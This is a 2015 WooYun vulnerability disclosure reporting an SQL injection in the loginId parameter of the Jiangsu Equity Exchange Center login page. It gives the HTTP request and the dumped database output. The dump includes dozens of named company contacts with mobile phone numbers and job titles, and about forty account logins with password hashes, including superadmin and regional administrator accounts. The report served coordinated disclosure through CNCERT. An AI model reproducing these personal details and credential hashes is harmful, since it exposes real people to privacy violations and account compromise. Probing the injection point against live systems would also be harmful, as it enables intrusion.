当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143192

漏洞标题:金融安全之江苏股权交易中心SQL注入(涉及管理员账号/336家公司基金信息)

相关厂商:江苏股权交易中心

漏洞作者: 深度安全实验室

提交时间:2015-09-24 15:32

修复时间:2015-11-13 09:40

公开时间:2015-11-13 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

详细说明:

江苏股权交易中心 如下链接存在SQL注入,其中,loginId参数有问题

POST /jsba/access.login.d HTTP/1.1
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:80/
Cookie: clientlanguage=zh_CN; JSESSIONID=F70D007148C21E120DC1976ADD1CA158; _error_remaining=1; JSESSIONID=70D7C1C8186E0E5556BF9488AEC5827C
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
login=%e7%99%bb%e5%bd%95&loginId=1&passwordOne=g00dPa%24%24w0rD

1.jpg

漏洞证明:

涉及21个库

2.jpg


以JS_SSBA库为例,涉及35个表

3.jpg

修复方案:

336家公司基金信息、40多个客户账户信息泄露

4.jpg


336家公司基金信息泄露

Database: JS_SSBA
Table: T_ENTERPRISE
[59 entries]
+-----------+----------+-------------------+------------+------------+----------------------------+
| BANK_CD | LXR_NAME | LXR_PHONE | QYMC | LXR_ZW | EMAIL |
+-----------+----------+-------------------+------------+------------+----------------------------+
| 321284001 | 吴江渝 | 15251695522 | | 副总裁、董事会秘书 | wujiangyu@china_**.**.**.** |
| 321284002 | 薛梁 | 18605239585 | | 董事会秘书助理 | ronglian@**.**.**.** |
| 321284003 | 史雅儒 | 13812393535 | 江苏江山制药有限公司 | 投资发展总监 | syr@**.**.**.** |
| 321284004 | 叶海滨 | 15952632999 | | 副总经理 | NULL |
| 321284005 | 高永兴 | 13337797586 | | 办公室主任 | cwb@**.**.**.** |
| 321284006 | 李正球 | 13952625101 | | 副总经理 | lzq@**.**.**.** |
| 321284007 | 陆卫明 | 15651161102 | | 办公室主任 | Lu1125@**.**.**.** | |
| 321284021 | 戴日全 | 13705264569 | | 总经理 | nhd@**.**.**.** |
| 321284024 | 计建康 | 13961055369 | 江苏兴海特钢有限公司 | 副总经理 | 13961055369@**.**.**.** |
| 321284026 | 凌小忠 | 13901430288 | 江苏罡阳股份有限公司 | 财务总监 | 334263248@QQ.COM |
| 320125003 | 任为荣 | 13585199777 | | 董秘 | NULL |
| 320125004 | 王玉红 | 025-84950885 | 南京宝色股份有限公司 | NULL | NULL |
| 320125005 | 费翔 | 13851691565 | | NULL | NULL |
| 320125008 | 倪萍 | 025-83751888 | | NULL | NULL |
| 320125009 | 贾如 | 025-82216299 | | NULL | NULL |
| 320125010 | 彭娜 | 025-82227888-8181 | 德讯科技股份有限公司 | NULL | NULL |
| 320125011 | 祝青 | 025-68553210 | | NULL | NULL |
| 320125012 | 林春华 | 025-52168888 | 南京多伦科技有限公司 | NULL | NULL |
| 320125013 | 沈卫宏 | 13701461915 | 南京寒锐钴业有限公司 | NULL | NULL |
| 320125014 | 刘万建 | 025-83291779 | | NULL | NULL |
| 320125015 | 汪诗弢 | 13951081122 | | NULL | NULL |
| 320125002 | 潘文兵 | 52785961 | | 董秘 | NULL |
| 320382006 | 唐献东 | 18914895808 | | 财务部部长 | txdong2008@**.**.**.** |
| 320382009 | 江文伟 | 13905219566 | 江苏徐航科技有限公司 | 董事会秘书 | jiangwenwei@**.**.**.** |
| 320382010 | 鲍嘉海 | 13905215780 | | 财务总监 | xzzb001@**.**.**.** |
| 321284020 | 柯春华 | 15152697252 | 江苏申源特钢有限公司 | 企管部主管 | sytg-kch@**.**.**.** |
| 320585046 | 张海东 | 13812923756 | | 董事会秘书 | zhanghaidong@**.**.**.** |
| 321284023 | 徐开昌 | 13601477698 | | 副总经理 | xukaichang@**.**.**.** |
| 321284025 | 徐开峰 | 13921719688 | | 总经理助理 | Xukaifeng78@**.**.**.** | |
| 320585047 | 金卫勤 | 15250151233 | | 董事会秘书 | Portl@**.**.**.** | |
| 320585058 | 顾红军 | 13951130695 | | 董事会秘书 | NULL |
| 320585059 | 王莉萍 | 13567370855 | | 财务总监 | 385121950@**.**.**.** |
| 320585060 | 吴疆 | 13962460527 | | 董事会秘书 | thoughter@**.**.**.** |
| 320585061 | 贾银铠 | 18913603600 | | 董秘 | jack.jia@**.**.**.** |
| 320585009 | 张建初 | 18962259381 | | 董事会秘书 | zhangjianchu@**.**.**.** |
| 320585010 | 钟雪冰 | 13812820223 | | 副总经理兼董事会秘书 | stock@**.**.**.** |
| 320585011 | 徐慧春 | 13701571087 | | 董事会秘书、董事 | jscsxhc@**.**.**.** |
| 320585014 | 汪进 | 13732618815 | | 秘书 | wangjin@**.**.**.** |
| 320585015 | 李小杨 | 13656226609 | | 董秘助理 | dongmi@**.**.**.** |
| 320585017 | 周予蘅 | 13306260090 | 江苏AB集团股份公司 | 董事会秘书 | zqb@**.**.**.** |
| 320585018 | 刘玮 | 15895466455 | 昆山华恒焊接股份公司 | 职员 | liuwei@**.**.**.** |
| 320585019 | 兰永长 | 18962631090 | | 董事会秘书 | lyc@**.**.**.** |
+-----------+----------+-------------------+------------+------------+----------------------------+


40多个客户账号、密码、银行卡号等敏感泄露

Database: JS_SSBA
Table: CIUSER
[40 entries]
+------------+----------------------+----------------------------------+-----------+------------+
| USER_ID | LOGIN_ID | PASSWD1 | BANK_CD | USER_NAME |
+------------+----------------------+----------------------------------+-----------+------------+
| 320500003 | cs | 04E33284235F246B1B9D7827A2986E3F | 320500000 | cs |
| 320500004 | tc | A940A511E3A2B8BCDA83D202D6EC8E4B | 320500000 | tc |
| 320500005 | ks | 9BC930C30BAEDE02F7F54C2105644D04 | 320500000 | ks |
| 320500009 | gs | 54782F23118EB0E3AD9020D04433B8D9 | 320500000 | gs |
| 320000016 | duanll | 9C8FFD6FCFC4139536F91345356A4CCE | 320000001 | 金农科技部 |
| 9999999999 | superadmin | 59088996DCB9A90F6E7D5C05D57B03C7 | 320000001 | SuperAdmin |
| 320000001 | lyx | BC0D69B8806BEA050FFC3193E6E21970 | 320000001 | 廖寅宵 |
| 320000002 | nanjing | 8A25076BCCFEF8472C8063B02B648E84 | 320100000 | 南京市管理员 |
| 320000003 | suzhou | 8698480F28DEA16A6A1FA7BB75F160C9 | 320500000 | 苏州市管理员 |
| 320000004 | wuxi | 785E5609EBAA2F23A932A630E3584D5A | 320200000 | 无锡市管理员 |
| 320000005 | jsjrb | 5028A7CC8DC36359125C19E85A77CE4D | 320000000 | 省金融办 |
| 320000006 | xuzhou | 7ADAB4402EBA58E04ECBFF234F5162EF | 320300000 | 徐州市管理员 |
| 320000009 | lianyungang | F6B28A3263E8427415A5FD5A573C6811 | 320700000 | 连云港市管理员 |
| 320000010 | huaian | 3ADB845B08375A314D6495763D542F03 | 320800000 | 淮安市管理员 |
| 320000011 | yancheng | CB152C3C35EFDD31C264E82734D78B73 | 320900000 | 盐城市管理员 |
| 320000013 | zhenjiang | 6EA01FC1A0748698B6C0DC419A479481 | 321100000 | 镇江市管理员 |
| 320000007 | changzhou | 9C7D9FD77673A5BCCA722BF9AF6527E7 | 320400000 | 常州市管理员 |
| 320000008 | nantong | E88DCA43F64B659CE9AC50697B47A512 | 320600000 | 南通市管理员 |
| 320000012 | yangzhou | 6FA594939D53A0C80E9079FD9DB95893 | 321000000 | 扬州市管理员 |
| 320000014 | taizhou | E7D66494265CC304DFEC4FE40A33F062 | 321200000 | 泰州市管理员 |
| 320000015 | suqian | 113DF31D7C1B74FD23CDC278D5E108F6 | 321300000 | 宿迁市管理员 |
| 320300001 | wuanjun | ACD23FFE083B2CC23D875907364B76F5 | 320300000 | 伍安军 |
| 320300002 | shengjie | B7D01B7C9205CA032E9B9F5F7B851869 | 320300000 | 盛洁 |
| 321100001 | danyang | 9B5C616C363BF8FD3DB58BBB4769EE2F | 321100000 | danyang |
| 321100002 | NULL | E6DCB1E56C7BD01828E9DE57B9C96A2F | 321100000 | danyang |
| 321100003 | xinqu | 657C34B1BFB99F11B2D989E857885FA7 | 321100000 | xinqu |
| 320500001 | suzhoutest | 4D31427D23674007BBDFB056F9E21CC4 | 320500000 | suzhoutest |
| 321100004 | jurong | DD6BEBF5C1609557AD710C43E4DC1550 | 321100000 | jurong |
| 321100005 | yangzhong | D7D5BECE5D37E0DDD4D7F941DCF5D3B9 | 321100000 | yangzhong |
| 321100008 | dantu | 5F5BC16A19F0FC8DC3DDC48A5C116913 | 321100000 | dantu |
| 321100006 | jingkou | DFDB612A6ED635286C668E79F06C6E45 | 321100000 | jingkou |
| 321100007 | runzhou | 210280B9BFE7B317EE320A70D3AE2207 | 321100000 | runzhou |
| 320500002 | zjg | A87EA9D433A425D61A5EB9D09A8EE1AC | 320500000 | zjg |
| 320500008 | xc | 4C0797F7C9C89922C91B688EADFFC523 | 320500000 | xc |
| 320500010 | gxq | 8EB18AA560F52619E61C12A5E6A74634 | 320500000 | gxq |
| 320000017 | jobtest | CB9008C612D8084BEFA588AFDA930767 | 320000001 | 业务测试 |
| 320500006 | wj | 7AE931530360A564A200BE7E603B06E8 | 320500000 | wj |
| 320500007 | wz | 2CB106CDADCE76CDC298A546848351DE | 320500000 | wz |
| 320500011 | gyyq | A50FFD3712A5D0875669F30C59893335 | 320500000 | gyyq |
| 321000001 | ljj | 9D6D70E99E64DA1B37F75DDB91F65444 | 321000000 | |
+------------+----------------------+----------------------------------+-----------+------------+

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-29 09:38

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无